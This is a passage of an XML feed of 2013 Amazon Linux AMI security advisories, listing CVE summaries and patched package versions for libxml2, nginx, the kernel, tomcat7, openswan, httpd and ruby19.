type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2378" title="" id="CVE-2013-2378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2389" title="" id="CVE-2013-2389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2391" title="" id="CVE-2013-2391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2392" title="" id="CVE-2013-2392" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0772.html" title="" id="RHSA-2013:0772" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded" version="5.5.31" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-embedded-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.31" release="1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-common-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.31-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-188</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-188: medium priority package update for libxml2</title><issued date="2013-05-13 10:28:00" /><updated date="2014-09-15 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0338:
libxml2 2.9.0 and earlier allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via an XML file containing an entity declaration with long replacement text and many references to this entity, aka "internal entity expansion" with linear complexity.
A denial of service flaw was found in the way libxml2 performed string substitutions when entity values for entity references replacement was enabled. A remote attacker could provide a specially-crafted XML file that, when processed by an application linked against libxml2, would lead to excessive CPU consumption.
912400:
CVE-2013-0338 libxml2: CPU consumption DoS when performing string substitutions during entities expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0338" title="" id="CVE-2013-0338" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-10.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-189</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-189: medium priority package update for nginx</title><issued date="2013-05-14 15:35:00" /><updated date="2014-09-15 23:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2070:
http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
962525:
CVE-2013-2070 nginx: denial of service or memory disclosure when using proxy_pass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2070" title="" id="CVE-2013-2070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.2.9" release="1.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.2.9-1.11.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.2.9" release="1.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.2.9-1.11.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.2.9" release="1.11.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.2.9-1.11.amzn1.i686.rpm</filename></package><package name="nginx" version="1.2.9" release="1.11.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.2.9-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-190</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-190: medium priority package update for kernel</title><issued date="2013-05-14 15:37:00" /><updated date="2014-09-15 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2094:
962792:
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094" title="" id="CVE-2013-2094" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.43" release="43.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.43-43.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-191</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-191: low priority package update for tomcat7</title><issued date="2013-05-24 13:55:00" /><updated date="2014-09-15 23:05:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2071:
961803:
CVE-2013-2071 tomcat: Information disclosure in asynchronous context when using AsyncListeners that threw RuntimeExceptions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2071" title="" id="CVE-2013-2071" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-lib" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2013-192</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-192: important priority package update for openswan</title><issued date="2013-05-24 13:56:00" /><updated date="2014-09-15 23:06:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2053:
A buffer overflow flaw was found in Openswan. If Opportunistic Encryption were enabled ("oe=yes" in "/etc/ipsec.conf") and an RSA key configured, an attacker able to cause a system to perform a DNS lookup for an attacker-controlled domain containing malicious records (such as by sending an email that triggers a DKIM or SPF DNS record lookup) could cause Openswan's pluto IKE daemon to crash or, potentially, execute arbitrary code with root privileges. With "oe=yes" but no RSA key configured, the issue can only be triggered by attackers on the local network who can control the reverse DNS entry of the target system. Opportunistic Encryption is disabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2053" title="" id="CVE-2013-2053" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0827.html" title="" id="RHSA-2013:0827" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openswan" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-2.16.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-2.16.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-193</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-193: medium priority package update for httpd</title><issued date="2013-05-24 13:56:00" /><updated date="2014-09-15 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1862:
It was found that mod_rewrite did not filter terminal escape sequences from its log file. If mod_rewrite was configured with the RewriteLog directive, a remote attacker could use specially-crafted HTTP requests to inject terminal escape sequences into the mod_rewrite log file. If a victim viewed the log file with a terminal emulator, it could result in arbitrary command execution with the privileges of that user.
CVE-2012-4558:
Cross-site scripting (XSS) flaws were found in the mod_proxy_balancer module's manager web interface. If a remote attacker could trick a user, who was logged into the manager web interface, into visiting a specially-crafted URL, it would lead to arbitrary web script execution in the context of the user's manager interface session.
CVE-2012-3499:
Cross-site scripting (XSS) flaws were found in the mod_info, mod_status, mod_imagemap, mod_ldap, and mod_proxy_ftp modules. An attacker could possibly use these flaws to perform XSS attacks if they were able to make the victim's browser generate an HTTP request with a specially-crafted Host header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" title="" id="CVE-2013-1862" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0815.html" title="" id="RHSA-2013:0815" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="2.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.24" release="2.31.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.24-2.31.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="2.31.amzn1" epoch="1" 
arch="i686"><filename>Packages/mod_ssl-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.24-2.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-194</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-194: medium priority package update for httpd24</title><issued date="2013-05-24 13:57:00" /><updated date="2014-09-15 23:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1862:
It was found that mod_rewrite did not filter terminal escape sequences from its log file. If mod_rewrite was configured with the RewriteLog directive, a remote attacker could use specially-crafted HTTP requests to inject terminal escape sequences into the mod_rewrite log file. If a victim viewed the log file with a terminal emulator, it could result in arbitrary command execution with the privileges of that user.
CVE-2012-4558:
Cross-site scripting (XSS) flaws were found in the mod_proxy_balancer module's manager web interface. If a remote attacker could trick a user, who was logged into the manager web interface, into visiting a specially-crafted URL, it would lead to arbitrary web script execution in the context of the user's manager interface session.
CVE-2012-3499:
Cross-site scripting (XSS) flaws were found in the mod_info, mod_status, mod_imagemap, mod_ldap, and mod_proxy_ftp modules. An attacker could possibly use these flaws to perform XSS attacks if they were able to make the victim's browser generate an HTTP request with a specially-crafted Host header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" title="" id="CVE-2013-1862" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0815.html" title="" id="RHSA-2013:0815" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.4" release="2.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.4" release="2.46.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.4-2.46.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" 
release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.46.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.46.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.4-2.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-195</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-195: medium priority package update for ruby19</title><issued date="2013-05-24 13:57:00" /><updated date="2014-09-15 23:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1821:
lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows remote attackers to cause a denial of service (memory consumption and crash) via crafted text nodes in an XML document, aka an XML Entity Expansion (XEE) attack.
It was discovered that Ruby's REXML library did not properly restrict XML entity expansion. An attacker could use this flaw to cause a denial of service by tricking a Ruby application using REXML to read text nodes from specially-crafted XML content, which will result in REXML consuming large amounts of system memory.
914716:
CVE-2013-1821 ruby: entity expansion DoS vulnerability in REXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1821" title="" id="CVE-2013-1821" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby19-debuginfo" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.392-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-29.38.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.392" release="29.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-29.38.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="29.38.amzn1" epoch="0" 
